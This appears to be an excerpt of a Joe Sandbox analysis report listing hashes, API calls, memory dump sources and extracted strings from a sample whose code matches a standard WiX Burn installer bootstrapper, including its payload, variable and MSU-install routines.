                                                                                                                • Opcode Fuzzy Hash: 38c6f03264848e77b8e8ac19178cc17413c1035ce828f3b3f280f38c9097eddd
                                                                                                                • Instruction Fuzzy Hash: 1CB11831650609DFD719CF28C49AB657BA0FF45364F29C669E89ACF3A2C335E981CB40
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009CEC20
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 2325560087-0
                                                                                                                • Opcode ID: 6b37def14933c35962a960d8dc94afc2712dea3f97e4137d3585bafb6eb56fc8
                                                                                                                • Instruction ID: e7a5138e35a74c802a6285c3b9926c44dd089011274b1c68c4bcbb9f7ca2350a
                                                                                                                • Opcode Fuzzy Hash: 6b37def14933c35962a960d8dc94afc2712dea3f97e4137d3585bafb6eb56fc8
                                                                                                                • Instruction Fuzzy Hash: 31511C71D003198BEB18CF99D985BAABBF8FB58310F14856AD406EB290D3759E12CF52
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,009CE131), ref: 009CE9E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 53aaa1147454a5318ea796ad034462c1cb9d6782e9bc4b9a9b4b3114e46f0dfe
                                                                                                                • Instruction ID: 397398808b6368e8f8004631937da27b9fa42c275f142314aa3706a0975d34e0
                                                                                                                • Opcode Fuzzy Hash: 53aaa1147454a5318ea796ad034462c1cb9d6782e9bc4b9a9b4b3114e46f0dfe
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e99ea13adc10927cea7d1c492ebc7a2a391baadc0c78fea716f3d391abd7924
                                                                                                                • Instruction ID: e5916066bd21a5711bf6c7d20f689196bdc6bf728af663cc7af1d0cff61516a7
                                                                                                                • Opcode Fuzzy Hash: 2e99ea13adc10927cea7d1c492ebc7a2a391baadc0c78fea716f3d391abd7924
                                                                                                                • Instruction Fuzzy Hash: 0702F8335081A20BDB2D4A39847063B7BEA6A833B071E47AED4F7CB1D6DE10D964D660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                • Instruction ID: 953e597624bbb9c74c4fbbf6f29b4fc1d09511c4b42079596d14370ebab405dc
                                                                                                                • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                • Instruction Fuzzy Hash: 01C1A4331491A20BDF6D4739843427EFBA55AD23B1B1A8B9FD4F2CB2C5EE249534D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                • Instruction ID: af867a352cc901e00cc790f0422b741ec065ba2303f60afe90184edd5e5c1a95
                                                                                                                • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                • Instruction Fuzzy Hash: 09C1A5371451A20AEF2D4239847427EFBA55ED23B0B1E979FD4F2CB2C5EE209534D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                • Instruction ID: d52bdf18d47593a620ad4f628e63900bbe09d6205c3abe441899f46965e97e59
                                                                                                                • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                • Instruction Fuzzy Hash: 4AC1B7321851A24BEF1D423A847467EFBE55AD23B0B1A879FD4F2CB2D5EE20D534D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                • Instruction ID: 0ed03b281a2570b24bdc14fca6ab5e4702618d7603fc8c9104216e7867f32e8a
                                                                                                                • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                • Instruction Fuzzy Hash: EDB1B3331491A20BEF2D4239843427EFBA55AD23B0B1E979FD4B2CB2C5EE20D525D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66bac9fdb7f0929e90e017315058851decb60fc178c15bd6bfa3408dc8a8a185
                                                                                                                • Instruction ID: 2253aef1222377e526005143f3345ff7c15e37193ad50c6ba6f5a344b7a534eb
                                                                                                                • Opcode Fuzzy Hash: 66bac9fdb7f0929e90e017315058851decb60fc178c15bd6bfa3408dc8a8a185
                                                                                                                • Instruction Fuzzy Hash: 1F6158716C470856DB389B2C8995BBE63ADABB1700F14CD1BF983EF381D615DE818326
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 009B0592
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                • API String ID: 3535843008-2755343042
                                                                                                                • Opcode ID: ae77fe07bdb4d1916ed0f06c35cc5f36b00b84536ee4f88c6879f593b243ec83
                                                                                                                • Instruction ID: acb0190feed14825d34e16e3f38f00cacaba5998137ea6b7fb1eb4b99d3ddd8c
                                                                                                                • Opcode Fuzzy Hash: ae77fe07bdb4d1916ed0f06c35cc5f36b00b84536ee4f88c6879f593b243ec83
                                                                                                                • Instruction Fuzzy Hash: 80F19231A4166EBBCB335665CE02FFF76A9ABC4724F140150FA0066662D7B1ED20EBD0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,009A545D,00000000,009ECA9C,009A5445,00000000), ref: 009ACEF3
                                                                                                                Strings
                                                                                                                • FileSize, xrefs: 009AD002
                                                                                                                • Failed to get @LayoutOnly., xrefs: 009AD197
                                                                                                                • Failed to get @FileSize., xrefs: 009AD1AB
                                                                                                                • Failed to get @FilePath., xrefs: 009AD21A
                                                                                                                • Failed to parse @FileSize., xrefs: 009AD1A1
                                                                                                                • embedded, xrefs: 009ACF05
                                                                                                                • CertificateRootPublicKeyIdentifier, xrefs: 009AD03D
                                                                                                                • download, xrefs: 009ACEE5
                                                                                                                • Invalid value for @Packaging: %ls, xrefs: 009AD200
                                                                                                                • Catalog, xrefs: 009AD0EC
                                                                                                                • DownloadUrl, xrefs: 009ACFD9
                                                                                                                • Failed to get payload node count., xrefs: 009ACE10
                                                                                                                • LayoutOnly, xrefs: 009ACF8D
                                                                                                                • Container, xrefs: 009ACF4B
                                                                                                                • Hash, xrefs: 009AD0B7
                                                                                                                • Failed to to find container: %ls, xrefs: 009AD186
                                                                                                                • SourcePath, xrefs: 009ACFB0
                                                                                                                • Failed to get next node., xrefs: 009AD228
                                                                                                                • Failed to get @Id., xrefs: 009AD221
                                                                                                                • Failed to hex decode the Payload/@Hash., xrefs: 009AD1DC
                                                                                                                • Failed to get @SourcePath., xrefs: 009AD1F1
                                                                                                                • Packaging, xrefs: 009ACEC6
                                                                                                                • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 009AD1B9
                                                                                                                • Failed to get @Hash., xrefs: 009AD1E3
                                                                                                                • Failed to get @CertificateRootThumbprint., xrefs: 009AD1C7
                                                                                                                • Failed to allocate memory for payload structs., xrefs: 009ACE49
                                                                                                                • Failed to select payload nodes., xrefs: 009ACDEB
                                                                                                                • Failed to get @Packaging., xrefs: 009AD213
                                                                                                                • payload.cpp, xrefs: 009ACE3F
                                                                                                                • CertificateRootThumbprint, xrefs: 009AD07A
                                                                                                                • Failed to hex decode @CertificateRootThumbprint., xrefs: 009AD1C0
                                                                                                                • Payload, xrefs: 009ACDD8
                                                                                                                • Failed to get @Catalog., xrefs: 009AD1D5
                                                                                                                • Failed to get @DownloadUrl., xrefs: 009AD1EA
                                                                                                                • FilePath, xrefs: 009ACEAB
                                                                                                                • Failed to get @Container., xrefs: 009AD18D
                                                                                                                • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 009AD1B2
                                                                                                                • external, xrefs: 009ACF21
                                                                                                                • Failed to find catalog., xrefs: 009AD1CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateCompareProcessString
                                                                                                                • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                • API String ID: 1171520630-3127305756
                                                                                                                • Opcode ID: 492fc1803cb95de544ee49324e516db12c28fb8cc3c2f648c7d953285369e24d
                                                                                                                • Instruction ID: 39d1fe6677b83c16be3bdcb114a890acca77c05a5efef7fc1162843ac5db00bf
                                                                                                                • Opcode Fuzzy Hash: 492fc1803cb95de544ee49324e516db12c28fb8cc3c2f648c7d953285369e24d
                                                                                                                • Instruction Fuzzy Hash: 47C11372D06669FBCB129A91CC01FADB668AF46B24F204272FD12BB590D774EE00C7D0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(009A5445,?,00000000,80070490,?,?,?,?,?,?,?,?,009CC1BF,?,009A5445,?), ref: 009A84A7
                                                                                                                • LeaveCriticalSection.KERNEL32(009A5445,?,?,?,?,?,?,?,?,009CC1BF,?,009A5445,?,009A5445,009A5445,Chain), ref: 009A8804
                                                                                                                Strings
                                                                                                                • Variable, xrefs: 009A84B1
                                                                                                                • Failed to insert variable '%ls'., xrefs: 009A86C6
                                                                                                                • Value, xrefs: 009A8565
                                                                                                                • Failed to get @Persisted., xrefs: 009A87E1
                                                                                                                • Failed to get variable node count., xrefs: 009A84E1
                                                                                                                • Attempt to set built-in variable value: %ls, xrefs: 009A87C8
                                                                                                                • Failed to get next node., xrefs: 009A87F6
                                                                                                                • Failed to get @Id., xrefs: 009A87EF
                                                                                                                • Persisted, xrefs: 009A854A
                                                                                                                • Failed to change variant type., xrefs: 009A87DA
                                                                                                                • Failed to set variant value., xrefs: 009A878F
                                                                                                                • numeric, xrefs: 009A85BC
                                                                                                                • Failed to get @Type., xrefs: 009A8788
                                                                                                                • Type, xrefs: 009A85A3
                                                                                                                • Invalid value for @Type: %ls, xrefs: 009A8778
                                                                                                                • Failed to get @Hidden., xrefs: 009A87E8
                                                                                                                • Initializing hidden variable '%ls', xrefs: 009A8671
                                                                                                                • Failed to get @Value., xrefs: 009A8796
                                                                                                                • Initializing numeric variable '%ls' to value '%ls', xrefs: 009A85E2
                                                                                                                • Failed to set value of variable: %ls, xrefs: 009A87A7
                                                                                                                • Failed to select variable nodes., xrefs: 009A84C4
                                                                                                                • Failed to set variant encryption, xrefs: 009A879D
                                                                                                                • Hidden, xrefs: 009A852F
                                                                                                                • variable.cpp, xrefs: 009A87B9
                                                                                                                • Initializing version variable '%ls' to value '%ls', xrefs: 009A8653
                                                                                                                • version, xrefs: 009A862C
                                                                                                                • Failed to find variable value '%ls'., xrefs: 009A87D2
                                                                                                                • string, xrefs: 009A85F7
                                                                                                                • Initializing string variable '%ls' to value '%ls', xrefs: 009A861A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                • API String ID: 3168844106-1614826165
                                                                                                                • Opcode ID: f0651445f68d67ba71576ba0f1570227538cc7618353ba2b2f058a6f21763799
                                                                                                                • Instruction ID: 831cf5a5720cc8a0b9554f7ec1349a36b053513f5fb539947b0e3f2d003f5e1c
                                                                                                                • Opcode Fuzzy Hash: f0651445f68d67ba71576ba0f1570227538cc7618353ba2b2f058a6f21763799
                                                                                                                • Instruction Fuzzy Hash: 36B1E0B2D00259FBCF129B95CC45EAFBBB8AF85710F200664F950B6290CB759E41DBD0
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,009BBDDC,00000007,?,?,?), ref: 009C6D20
                                                                                                                  • Part of subcall function 009E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,009A5EB2,00000000), ref: 009E0AE0
                                                                                                                  • Part of subcall function 009E0ACC: GetProcAddress.KERNEL32(00000000), ref: 009E0AE7
                                                                                                                  • Part of subcall function 009E0ACC: GetLastError.KERNEL32(?,?,?,009A5EB2,00000000), ref: 009E0AFE
                                                                                                                • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 009C710F
                                                                                                                • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 009C7123
                                                                                                                Strings
                                                                                                                • "%ls" "%ls" /quiet /norestart, xrefs: 009C6E48
                                                                                                                • Failed to CreateProcess on path: %ls, xrefs: 009C6F9A
                                                                                                                • Failed to allocate WUSA.exe path., xrefs: 009C6DB3
                                                                                                                • Failed to ensure WU service was enabled to install MSU package., xrefs: 009C6F2E
                                                                                                                • Failed to format MSU install command., xrefs: 009C6E5C
                                                                                                                • Failed to append log path to MSU command-line., xrefs: 009C6ED4
                                                                                                                • Failed to wait for executable to complete: %ls, xrefs: 009C709E
                                                                                                                • wusa.exe, xrefs: 009C6DA0
                                                                                                                • Failed to get cached path for package: %ls, xrefs: 009C6DFC
                                                                                                                • 2, xrefs: 009C6FB3
                                                                                                                • Failed to find System32 directory., xrefs: 009C6D95
                                                                                                                • Failed to append log switch to MSU command-line., xrefs: 009C6EB6
                                                                                                                • Failed to get action arguments for MSU package., xrefs: 009C6DD6
                                                                                                                • Bootstrapper application aborted during MSU progress., xrefs: 009C7054
                                                                                                                • D, xrefs: 009C6F3B
                                                                                                                • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 009C6E75
                                                                                                                • Failed to format MSU uninstall command., xrefs: 009C6E89
                                                                                                                • Failed to append SysNative directory., xrefs: 009C6D7D
                                                                                                                • msuengine.cpp, xrefs: 009C6F8D, 009C7022, 009C704A
                                                                                                                • /log:, xrefs: 009C6EA2
                                                                                                                • Failed to get process exit code., xrefs: 009C702C
                                                                                                                • WixBundleExecutePackageCacheFolder, xrefs: 009C6E0B, 009C713B
                                                                                                                • Failed to determine WOW64 status., xrefs: 009C6D32
                                                                                                                • SysNative\, xrefs: 009C6D6A
                                                                                                                • Failed to find Windows directory., xrefs: 009C6D5F
                                                                                                                • Failed to build MSU path., xrefs: 009C6E35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                • API String ID: 1400713077-4261965642
                                                                                                                • Opcode ID: 8cbaae523158381cf13e3f019e06fdaf62fe93a3e9ec127588253a36e59473da
                                                                                                                • Instruction ID: f4a662cdf820c1ba78e58cc183cb0067ba61f2c85781acbed882d7008f7eecaf
                                                                                                                • Opcode Fuzzy Hash: 8cbaae523158381cf13e3f019e06fdaf62fe93a3e9ec127588253a36e59473da
                                                                                                                • Instruction Fuzzy Hash: 70D1AEB1E4430EBBDB119FE5CC85FAEBBB9AF48704F10042DF601A61A1D7B59E409B52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 009E755D
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7726
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E77C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
